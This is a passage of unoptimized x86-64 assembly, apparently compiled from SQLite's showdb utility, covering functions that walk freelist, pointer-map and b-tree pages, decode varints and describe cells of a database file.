LBB10_1: ## =>This Inner Loop Header: Depth=1
cmpl $4, -144(%rbp)
jge LBB10_7
## %bb.2: ## in Loop: Header=BB10_1 Depth=1
movl -144(%rbp), %eax
cmpl -128(%rbp), %eax
jl LBB10_4
## %bb.3: ## in Loop: Header=BB10_1 Depth=1
movslq -140(%rbp), %rax
leaq -112(%rbp), %rdi
addq %rax, %rdi
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.18(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
jmp LBB10_5
LBB10_4: ## in Loop: Header=BB10_1 Depth=1
movslq -140(%rbp), %rax
leaq -112(%rbp), %rdi
addq %rax, %rdi
movq -120(%rbp), %rax
movl -124(%rbp), %ecx
addl -144(%rbp), %ecx
movslq %ecx, %rcx
movzbl (%rax,%rcx), %r8d
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.48(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
movl -148(%rbp), %eax
shll $8, %eax
movq -120(%rbp), %rcx
movl -124(%rbp), %edx
addl -144(%rbp), %edx
movslq %edx, %rdx
movzbl (%rcx,%rdx), %ecx
addl %ecx, %eax
movl %eax, -148(%rbp)
LBB10_5: ## in Loop: Header=BB10_1 Depth=1
movslq -140(%rbp), %rax
leaq -112(%rbp), %rdi
addq %rax, %rdi
callq _strlen
## kill: def $eax killed $eax killed $rax
addl -140(%rbp), %eax
movl %eax, -140(%rbp)
## %bb.6: ## in Loop: Header=BB10_1 Depth=1
movl -144(%rbp), %eax
addl $1, %eax
movl %eax, -144(%rbp)
jmp LBB10_1
LBB10_7:
movslq -140(%rbp), %rax
leaq -112(%rbp), %rdi
addq %rax, %rdi
movl -148(%rbp), %r8d
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.49(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq -112(%rbp), %rsi
movq -136(%rbp), %rdx
leaq L_.str.50(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB10_9
## %bb.8:
addq $160, %rsp
popq %rbp
retq
LBB10_9:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function out_of_memory
_out_of_memory: ## @out_of_memory
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.61(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function page_usage_freelist
_page_usage_freelist: ## @page_usage_freelist
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -4(%rbp)
movl $0, -20(%rbp)
movl $1, -36(%rbp)
LBB12_1: ## =>This Loop Header: Depth=1
## Child Loop BB12_6 Depth 2
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -4(%rbp)
movb %al, -41(%rbp) ## 1-byte Spill
jle LBB12_4
## %bb.2: ## in Loop: Header=BB12_1 Depth=1
movl -4(%rbp), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl _mxPage(%rip), %ecx
movb %al, -41(%rbp) ## 1-byte Spill
jg LBB12_4
## %bb.3: ## in Loop: Header=BB12_1 Depth=1
movl -20(%rbp), %eax
movl %eax, %ecx
addl $1, %ecx
movl %ecx, -20(%rbp)
cmpl _mxPage(%rip), %eax
setl %al
movb %al, -41(%rbp) ## 1-byte Spill
LBB12_4: ## in Loop: Header=BB12_1 Depth=1
movb -41(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB12_5
jmp LBB12_10
LBB12_5: ## in Loop: Header=BB12_1 Depth=1
movl -4(%rbp), %edi
movl -20(%rbp), %edx
movl -36(%rbp), %ecx
leaq L_.str.62(%rip), %rsi
movb $0, %al
callq _page_usage_msg
movl -4(%rbp), %edi
subl $1, %edi
imull _pagesize(%rip), %edi
movl _pagesize(%rip), %esi
callq _getContent
movq %rax, -16(%rbp)
movq -16(%rbp), %rdi
callq _decodeInt32
movl %eax, -32(%rbp)
movq -16(%rbp), %rdi
addq $4, %rdi
callq _decodeInt32
movl %eax, -28(%rbp)
movl $0, -24(%rbp)
LBB12_6: ## Parent Loop BB12_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -24(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB12_9
## %bb.7: ## in Loop: Header=BB12_6 Depth=2
movq -16(%rbp), %rdi
movl -24(%rbp), %eax
shll $2, %eax
addl $8, %eax
cltq
addq %rax, %rdi
callq _decodeInt32
movl %eax, -40(%rbp)
movl -40(%rbp), %edi
movl -24(%rbp), %edx
movl -4(%rbp), %ecx
leaq L_.str.63(%rip), %rsi
movb $0, %al
callq _page_usage_msg
## %bb.8: ## in Loop: Header=BB12_6 Depth=2
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB12_6
LBB12_9: ## in Loop: Header=BB12_1 Depth=1
movq -16(%rbp), %rdi
callq _free
movl -4(%rbp), %eax
movl %eax, -36(%rbp)
movl -32(%rbp), %eax
movl %eax, -4(%rbp)
jmp LBB12_1
LBB12_10:
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function decodeInt32
_decodeInt32: ## @decodeInt32
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movzbl (%rax), %eax
shll $24, %eax
movq -8(%rbp), %rcx
movzbl 1(%rcx), %ecx
shll $16, %ecx
addl %ecx, %eax
movq -8(%rbp), %rcx
movzbl 2(%rcx), %ecx
shll $8, %ecx
addl %ecx, %eax
movq -8(%rbp), %rcx
movzbl 3(%rcx), %ecx
addl %ecx, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function page_usage_ptrmap
_page_usage_ptrmap: ## @page_usage_ptrmap
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
cmpb $0, 55(%rax)
je LBB14_5
## %bb.1:
movl _pagesize(%rip), %eax
movq -8(%rbp), %rcx
movzbl 20(%rcx), %ecx
subl %ecx, %eax
movl %eax, -12(%rbp)
movl $2, -16(%rbp)
movl -12(%rbp), %eax
movl $5, %ecx
cltd
idivl %ecx
movl %eax, -20(%rbp)
LBB14_2: ## =>This Inner Loop Header: Depth=1
movl -16(%rbp), %eax
cmpl _mxPage(%rip), %eax
jg LBB14_4
## %bb.3: ## in Loop: Header=BB14_2 Depth=1
movl -16(%rbp), %edi
movl -16(%rbp), %edx
addl $1, %edx
movl -16(%rbp), %ecx
addl -20(%rbp), %ecx
leaq L_.str.68(%rip), %rsi
movb $0, %al
callq _page_usage_msg
movl -20(%rbp), %eax
addl $1, %eax
addl -16(%rbp), %eax
movl %eax, -16(%rbp)
jmp LBB14_2
LBB14_4:
jmp LBB14_5
LBB14_5:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function page_usage_btree
_page_usage_btree: ## @page_usage_btree
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl %edx, -12(%rbp)
movq %rcx, -24(%rbp)
leaq L_.str.69(%rip), %rax
movq %rax, -40(%rbp)
movl -4(%rbp), %edx
xorl %eax, %eax
movl $100, %ecx
cmpl $1, %edx
cmovel %ecx, %eax
movl %eax, -52(%rbp)
cmpl $0, -4(%rbp)
jle LBB15_2
## %bb.1:
movl -4(%rbp), %eax
cmpl _mxPage(%rip), %eax
jle LBB15_3
LBB15_2:
jmp LBB15_27
LBB15_3:
movl -4(%rbp), %edi
decl %edi
movl _pagesize(%rip), %esi
imull %esi, %edi
callq _getContent
movq %rax, -32(%rbp)
movq -32(%rbp), %rax
movslq -52(%rbp), %rcx
movzbl (%rax,%rcx), %eax
addl $-2, %eax
movl %eax, %ecx
movq %rcx, -80(%rbp) ## 8-byte Spill
subl $11, %eax
ja LBB15_8
## %bb.28:
movq -80(%rbp), %rax ## 8-byte Reload
leaq LJTI15_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB15_4:
leaq L_.str.70(%rip), %rax
movq %rax, -40(%rbp)
jmp LBB15_8
LBB15_5:
leaq L_.str.71(%rip), %rax
movq %rax, -40(%rbp)
jmp LBB15_8
LBB15_6:
leaq L_.str.72(%rip), %rax
movq %rax, -40(%rbp)
jmp LBB15_8
LBB15_7:
leaq L_.str.73(%rip), %rax
movq %rax, -40(%rbp)
LBB15_8:
cmpl $0, -8(%rbp)
je LBB15_10
## %bb.9:
movl -4(%rbp), %edi
movq -40(%rbp), %rdx
movq -24(%rbp), %rcx
movl -12(%rbp), %r8d
movl -8(%rbp), %r9d
leaq L_.str.74(%rip), %rsi
movb $0, %al
callq _page_usage_msg
jmp LBB15_11
LBB15_10:
movl -4(%rbp), %edi
movq -40(%rbp), %rdx
movq -24(%rbp), %rcx
leaq L_.str.75(%rip), %rsi
movb $0, %al
callq _page_usage_msg
LBB15_11:
movq -32(%rbp), %rax
movl -52(%rbp), %ecx
addl $3, %ecx
movslq %ecx, %rcx
movzbl (%rax,%rcx), %eax
shll $8, %eax
movq -32(%rbp), %rcx
movl -52(%rbp), %edx
addl $4, %edx
movslq %edx, %rdx
movzbl (%rcx,%rdx), %ecx
addl %ecx, %eax
movl %eax, -44(%rbp)
movq -32(%rbp), %rax
movslq -52(%rbp), %rcx
movzbl (%rax,%rcx), %eax
cmpl $2, %eax
je LBB15_13
## %bb.12:
movq -32(%rbp), %rax
movslq -52(%rbp), %rcx
movzbl (%rax,%rcx), %eax
cmpl $5, %eax
jne LBB15_18
LBB15_13:
movl -52(%rbp), %eax
addl $12, %eax
movl %eax, -56(%rbp)
movl $0, -48(%rbp)
LBB15_14: ## =>This Inner Loop Header: Depth=1
movl -48(%rbp), %eax
cmpl -44(%rbp), %eax
jge LBB15_17
## %bb.15: ## in Loop: Header=BB15_14 Depth=1
movl -56(%rbp), %eax
movl -48(%rbp), %ecx
shll $1, %ecx
addl %ecx, %eax
movl %eax, -64(%rbp)
movq -32(%rbp), %rax
movslq -64(%rbp), %rcx
movzbl (%rax,%rcx), %eax
shll $8, %eax
movq -32(%rbp), %rcx
movl -64(%rbp), %edx
addl $1, %edx
movslq %edx, %rdx
movzbl (%rcx,%rdx), %ecx
addl %ecx, %eax
movl %eax, -64(%rbp)
movq -32(%rbp), %rdi
movslq -64(%rbp), %rax
addq %rax, %rdi
callq _decodeInt32
movl %eax, -60(%rbp)
movl -60(%rbp), %edi
movl -4(%rbp), %esi
movl -48(%rbp), %edx
movq -24(%rbp), %rcx
callq _page_usage_btree
## %bb.16: ## in Loop: Header=BB15_14 Depth=1
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB15_14
LBB15_17:
movq -32(%rbp), %rdi
movslq -56(%rbp), %rax
addq %rax, %rdi
addq $-4, %rdi
callq _decodeInt32
movl %eax, -60(%rbp)
movl -60(%rbp), %edi
movl -4(%rbp), %esi
movl -48(%rbp), %edx
movq -24(%rbp), %rcx
callq _page_usage_btree
LBB15_18:
movq -32(%rbp), %rax
movslq -52(%rbp), %rcx
movzbl (%rax,%rcx), %eax
cmpl $2, %eax
je LBB15_21
## %bb.19:
movq -32(%rbp), %rax
movslq -52(%rbp), %rcx
movzbl (%rax,%rcx), %eax
cmpl $10, %eax
je LBB15_21
## %bb.20:
movq -32(%rbp), %rax
movslq -52(%rbp), %rcx
movzbl (%rax,%rcx), %eax
cmpl $13, %eax
jne LBB15_26
LBB15_21:
movl -52(%rbp), %eax
addl $8, %eax
movq -32(%rbp), %rcx
movslq -52(%rbp), %rdx
movzbl (%rcx,%rdx), %ecx
cmpl $5, %ecx
setle %cl
andb $1, %cl
movzbl %cl, %ecx
shll $2, %ecx
addl %ecx, %eax
movl %eax, -68(%rbp)
movl $0, -48(%rbp)
LBB15_22: ## =>This Inner Loop Header: Depth=1
movl -48(%rbp), %eax
cmpl -44(%rbp), %eax
jge LBB15_25
## %bb.23: ## in Loop: Header=BB15_22 Depth=1
movl -68(%rbp), %eax
movl -48(%rbp), %ecx
shll $1, %ecx
addl %ecx, %eax
movl %eax, -72(%rbp)
movq -32(%rbp), %rax
movslq -72(%rbp), %rcx
movzbl (%rax,%rcx), %eax
shll $8, %eax
movq -32(%rbp), %rcx
movl -72(%rbp), %edx
addl $1, %edx
movslq %edx, %rdx
movzbl (%rcx,%rdx), %ecx
addl %ecx, %eax
movl %eax, -72(%rbp)
movq -32(%rbp), %rax
movslq -52(%rbp), %rcx
movb (%rax,%rcx), %al
movq -32(%rbp), %rsi
movslq -72(%rbp), %rcx
addq %rcx, %rsi
movl -4(%rbp), %edx
movl -48(%rbp), %ecx
movzbl %al, %edi
callq _page_usage_cell
## %bb.24: ## in Loop: Header=BB15_22 Depth=1
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB15_22
LBB15_25:
jmp LBB15_26
LBB15_26:
movq -32(%rbp), %rdi
callq _free
LBB15_27:
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L15_0_set_4, LBB15_4-LJTI15_0
.set L15_0_set_8, LBB15_8-LJTI15_0
.set L15_0_set_5, LBB15_5-LJTI15_0
.set L15_0_set_6, LBB15_6-LJTI15_0
.set L15_0_set_7, LBB15_7-LJTI15_0
LJTI15_0:
.long L15_0_set_4
.long L15_0_set_8
.long L15_0_set_8
.long L15_0_set_5
.long L15_0_set_8
.long L15_0_set_8
.long L15_0_set_8
.long L15_0_set_8
.long L15_0_set_6
.long L15_0_set_8
.long L15_0_set_8
.long L15_0_set_7
.end_data_region
## -- End function
.p2align 4, 0x90 ## -- Begin function page_usage_msg
_page_usage_msg: ## @page_usage_msg
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
testb %al, %al
je LBB16_10
## %bb.9:
movaps %xmm0, -192(%rbp)
movaps %xmm1, -176(%rbp)
movaps %xmm2, -160(%rbp)
movaps %xmm3, -144(%rbp)
movaps %xmm4, -128(%rbp)
movaps %xmm5, -112(%rbp)
movaps %xmm6, -96(%rbp)
movaps %xmm7, -80(%rbp)
LBB16_10:
movq %r9, -200(%rbp)
movq %r8, -208(%rbp)
movq %rcx, -216(%rbp)
movq %rdx, -224(%rbp)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl %edi, -36(%rbp)
movq %rsi, -48(%rbp)
leaq -32(%rbp), %rax
leaq -240(%rbp), %rcx
movq %rcx, 16(%rax)
leaq 16(%rbp), %rcx
movq %rcx, 8(%rax)
movl $48, 4(%rax)
movl $16, (%rax)
movq -48(%rbp), %rdi
leaq -32(%rbp), %rsi
callq _sqlite3_vmprintf
movq %rax, -56(%rbp)
leaq -32(%rbp), %rax
cmpl $0, -36(%rbp)
jle LBB16_2
## %bb.1:
movl -36(%rbp), %eax
cmpl _mxPage(%rip), %eax
jle LBB16_3
LBB16_2:
movl -36(%rbp), %esi
movl _mxPage(%rip), %edx
movq -56(%rbp), %rcx
leaq L_.str.64(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rdi
callq _sqlite3_free
jmp LBB16_6
LBB16_3:
movq _zPageUse(%rip), %rax
movslq -36(%rbp), %rcx
cmpq $0, (%rax,%rcx,8)
je LBB16_5
## %bb.4:
movl -36(%rbp), %esi
leaq L_.str.65(%rip), %rdi
movb $0, %al
callq _printf
movq _zPageUse(%rip), %rax
movslq -36(%rbp), %rcx
movq (%rax,%rcx,8), %rsi
leaq L_.str.66(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rsi
leaq L_.str.67(%rip), %rdi
movb $0, %al
callq _printf
movq _zPageUse(%rip), %rax
movslq -36(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
callq _sqlite3_free
LBB16_5:
movq -56(%rbp), %rdx
movq _zPageUse(%rip), %rax
movslq -36(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
LBB16_6:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB16_8
## %bb.7:
addq $240, %rsp
popq %rbp
retq
LBB16_8:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function page_usage_cell
_page_usage_cell: ## @page_usage_cell
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movb %dil, %al
movb %al, -1(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movl %ecx, -24(%rbp)
movl $0, -32(%rbp)
movl $0, -28(%rbp)
movzbl -1(%rbp), %eax
cmpl $5, %eax
jg LBB17_2
## %bb.1:
movq -16(%rbp), %rax
addq $4, %rax
movq %rax, -16(%rbp)
movl -32(%rbp), %eax
addl $4, %eax
movl %eax, -32(%rbp)
LBB17_2:
movzbl -1(%rbp), %eax
cmpl $5, %eax
je LBB17_4
## %bb.3:
movq -16(%rbp), %rdi
leaq -40(%rbp), %rsi
callq _decodeVarint
movl %eax, -28(%rbp)
movl -28(%rbp), %ecx
movq -16(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -16(%rbp)
movl -28(%rbp), %eax
addl -32(%rbp), %eax
movl %eax, -32(%rbp)
movq -40(%rbp), %rdi
movsbl -1(%rbp), %esi
callq _localPayload
movq %rax, -56(%rbp)
jmp LBB17_5
LBB17_4:
movq $0, -56(%rbp)
movq $0, -40(%rbp)
LBB17_5:
movzbl -1(%rbp), %eax
cmpl $5, %eax
je LBB17_7
## %bb.6:
movzbl -1(%rbp), %eax
cmpl $13, %eax
jne LBB17_8
LBB17_7:
movq -16(%rbp), %rdi
leaq -48(%rbp), %rsi
callq _decodeVarint
movl %eax, -28(%rbp)
movl -28(%rbp), %ecx
movq -16(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -16(%rbp)
movl -28(%rbp), %eax
addl -32(%rbp), %eax
movl %eax, -32(%rbp)
LBB17_8:
movq -56(%rbp), %rax
cmpq -40(%rbp), %rax
jge LBB17_15
## %bb.9:
movq -16(%rbp), %rdi
addq -56(%rbp), %rdi
callq _decodeInt32
movl %eax, -60(%rbp)
movl $0, -64(%rbp)
LBB17_10: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -60(%rbp)
movb %al, -65(%rbp) ## 1-byte Spill
je LBB17_12
## %bb.11: ## in Loop: Header=BB17_10 Depth=1
movl -64(%rbp), %eax
movl %eax, %ecx
addl $1, %ecx
movl %ecx, -64(%rbp)
cmpl _mxPage(%rip), %eax
setl %al
movb %al, -65(%rbp) ## 1-byte Spill
LBB17_12: ## in Loop: Header=BB17_10 Depth=1
movb -65(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB17_13
jmp LBB17_14
LBB17_13: ## in Loop: Header=BB17_10 Depth=1
movl -60(%rbp), %edi
movl -64(%rbp), %edx
movl -24(%rbp), %ecx
movl -20(%rbp), %r8d
leaq L_.str.76(%rip), %rsi
movb $0, %al
callq _page_usage_msg
movl -60(%rbp), %edi
subl $1, %edi
imull _pagesize(%rip), %edi
movl $4, %esi
callq _getContent
movq %rax, -16(%rbp)
movq -16(%rbp), %rdi
callq _decodeInt32
movl %eax, -60(%rbp)
movq -16(%rbp), %rdi
callq _free
jmp LBB17_10
LBB17_14:
jmp LBB17_15
LBB17_15:
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function decodeVarint
_decodeVarint: ## @decodeVarint
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq $0, -32(%rbp)
movl $0, -36(%rbp)
LBB18_1: ## =>This Inner Loop Header: Depth=1
cmpl $8, -36(%rbp)
jge LBB18_6
## %bb.2: ## in Loop: Header=BB18_1 Depth=1
movq -32(%rbp), %rax
shlq $7, %rax
movq -16(%rbp), %rcx
movslq -36(%rbp), %rdx
movzbl (%rcx,%rdx), %ecx
andl $127, %ecx
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
movslq -36(%rbp), %rcx
movzbl (%rax,%rcx), %eax
andl $128, %eax
cmpl $0, %eax
jne LBB18_4
## %bb.3:
movq -32(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, (%rax)
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -4(%rbp)
jmp LBB18_7
LBB18_4: ## in Loop: Header=BB18_1 Depth=1
jmp LBB18_5
LBB18_5: ## in Loop: Header=BB18_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB18_1
LBB18_6:
movq -32(%rbp), %rax
shlq $8, %rax
movq -16(%rbp), %rcx
movslq -36(%rbp), %rdx
movzbl (%rcx,%rdx), %ecx
andl $255, %ecx
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -32(%rbp)
movq -32(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, (%rax)
movl $9, -4(%rbp)
LBB18_7:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function localPayload
_localPayload: ## @localPayload
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %sil, %al
movq %rdi, -8(%rbp)
movb %al, -9(%rbp)
movsbl -9(%rbp), %eax
cmpl $13, %eax
jne LBB19_2
## %bb.1:
movl _pagesize(%rip), %eax
subl $35, %eax
cltq
movq %rax, -24(%rbp)
movl _pagesize(%rip), %eax
subl $12, %eax
shll $5, %eax
movl $255, %ecx
cltd
idivl %ecx
subl $23, %eax
cltq
movq %rax, -32(%rbp)
jmp LBB19_3
LBB19_2:
movl _pagesize(%rip), %eax
subl $12, %eax
shll $6, %eax
movl $255, %ecx
cltd
idivl %ecx
subl $23, %eax
cltq
movq %rax, -24(%rbp)
movl _pagesize(%rip), %eax
subl $12, %eax
shll $5, %eax
movl $255, %ecx
cltd
idivl %ecx
subl $23, %eax
cltq
movq %rax, -32(%rbp)
LBB19_3:
movq -8(%rbp), %rax
cmpq -24(%rbp), %rax
jle LBB19_8
## %bb.4:
movq -32(%rbp), %rax
movq %rax, -56(%rbp) ## 8-byte Spill
movq -8(%rbp), %rax
subq -32(%rbp), %rax
movl _pagesize(%rip), %ecx
subl $4, %ecx
movslq %ecx, %rcx
cqto
idivq %rcx
movq -56(%rbp), %rax ## 8-byte Reload
addq %rdx, %rax
movq %rax, -40(%rbp)
movq -40(%rbp), %rax
cmpq -24(%rbp), %rax
jg LBB19_6
## %bb.5:
movq -40(%rbp), %rax
movq %rax, -48(%rbp)
jmp LBB19_7
LBB19_6:
movq -32(%rbp), %rax
movq %rax, -48(%rbp)
LBB19_7:
jmp LBB19_9
LBB19_8:
movq -8(%rbp), %rax
movq %rax, -48(%rbp)
LBB19_9:
movq -48(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function describeCell
_describeCell: ## @describeCell
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movb %dil, %al
movb %al, -1(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movq %rcx, -32(%rbp)
movq $0, -48(%rbp)
movl $0, -52(%rbp)
movl $0, -36(%rbp)
movzbl -1(%rbp), %eax
cmpl $5, %eax
jg LBB20_2
## %bb.1:
movq -16(%rbp), %rax
movzbl (%rax), %eax
shll $8, %eax
movq -16(%rbp), %rcx
movzbl 1(%rcx), %ecx
addl %ecx, %eax
shll $8, %eax
movq -16(%rbp), %rcx
movzbl 2(%rcx), %ecx
addl %ecx, %eax
shll $8, %eax
movq -16(%rbp), %rcx
movzbl 3(%rcx), %ecx
addl %ecx, %eax
movl %eax, -56(%rbp)
movq -16(%rbp), %rax
addq $4, %rax
movq %rax, -16(%rbp)
movl -52(%rbp), %eax
addl $4, %eax
movl %eax, -52(%rbp)
movl -56(%rbp), %r8d
leaq _describeCell.zDesc(%rip), %rdi
xorl %esi, %esi
movl $1000, %edx ## imm = 0x3E8
leaq L_.str.103(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq _describeCell.zDesc(%rip), %rdi
callq _strlen
movq %rax, -48(%rbp)
LBB20_2:
movzbl -1(%rbp), %eax
cmpl $5, %eax
je LBB20_4
## %bb.3:
movq -16(%rbp), %rdi
leaq -64(%rbp), %rsi
callq _decodeVarint
movl %eax, -36(%rbp)
movl -36(%rbp), %ecx
movq -16(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -16(%rbp)
movl -36(%rbp), %eax
addl -52(%rbp), %eax
movl %eax, -52(%rbp)
leaq _describeCell.zDesc(%rip), %rdi
addq -48(%rbp), %rdi
movq -64(%rbp), %r8
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.104(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq _describeCell.zDesc(%rip), %rdi
addq -48(%rbp), %rdi
callq _strlen
addq -48(%rbp), %rax
movq %rax, -48(%rbp)
movq -64(%rbp), %rdi
movsbl -1(%rbp), %esi
callq _localPayload
movq %rax, -80(%rbp)
jmp LBB20_5
LBB20_4:
movq $0, -80(%rbp)
movq $0, -64(%rbp)
LBB20_5:
movzbl -1(%rbp), %eax
cmpl $5, %eax
je LBB20_7
## %bb.6:
movzbl -1(%rbp), %eax
cmpl $13, %eax
jne LBB20_8
LBB20_7:
movq -16(%rbp), %rdi
leaq -72(%rbp), %rsi
callq _decodeVarint
movl %eax, -36(%rbp)
movl -36(%rbp), %ecx
movq -16(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -16(%rbp)
movl -36(%rbp), %eax
addl -52(%rbp), %eax
movl %eax, -52(%rbp)
leaq _describeCell.zDesc(%rip), %rdi
addq -48(%rbp), %rdi
movq -72(%rbp), %r8
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.105(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq _describeCell.zDesc(%rip), %rdi
addq -48(%rbp), %rdi
callq _strlen
addq -48(%rbp), %rax
movq %rax, -48(%rbp)
LBB20_8:
movq -80(%rbp), %rax
cmpq -64(%rbp), %rax
jge LBB20_10
## %bb.9:
movq -16(%rbp), %rax
addq -80(%rbp), %rax
movq %rax, -96(%rbp)
movq -96(%rbp), %rax
movzbl (%rax), %eax
shll $8, %eax
movq -96(%rbp), %rcx
movzbl 1(%rcx), %ecx
addl %ecx, %eax
shll $8, %eax
movq -96(%rbp), %rcx
movzbl 2(%rcx), %ecx
addl %ecx, %eax
shll $8, %eax
movq -96(%rbp), %rcx
movzbl 3(%rcx), %ecx
addl %ecx, %eax
movl %eax, -84(%rbp)
leaq _describeCell.zDesc(%rip), %rdi
addq -48(%rbp), %rdi
movl -84(%rbp), %r8d
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.106(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq _describeCell.zDesc(%rip), %rdi
addq -48(%rbp), %rdi
callq _strlen
addq -48(%rbp), %rax
movq %rax, -48(%rbp)
movl -52(%rbp), %eax
addl $4, %eax
movl %eax, -52(%rbp)
LBB20_10:
cmpl $0, -20(%rbp)
je LBB20_13
## %bb.11:
movzbl -1(%rbp), %eax
cmpl $5, %eax
je LBB20_13
## %bb.12:
movq -16(%rbp), %rdi
movq -80(%rbp), %rsi
movq -48(%rbp), %rax
subq $1, %rax
leaq _describeCell.zDesc(%rip), %rdx
addq %rax, %rdx
callq _describeContent
addq -48(%rbp), %rax
movq %rax, -48(%rbp)
LBB20_13:
movq -32(%rbp), %rax
leaq _describeCell.zDesc(%rip), %rcx
movq %rcx, (%rax)
movq -80(%rbp), %rax
movslq -52(%rbp), %rcx
addq %rcx, %rax
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function decodeCell
_decodeCell: ## @decodeCell
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
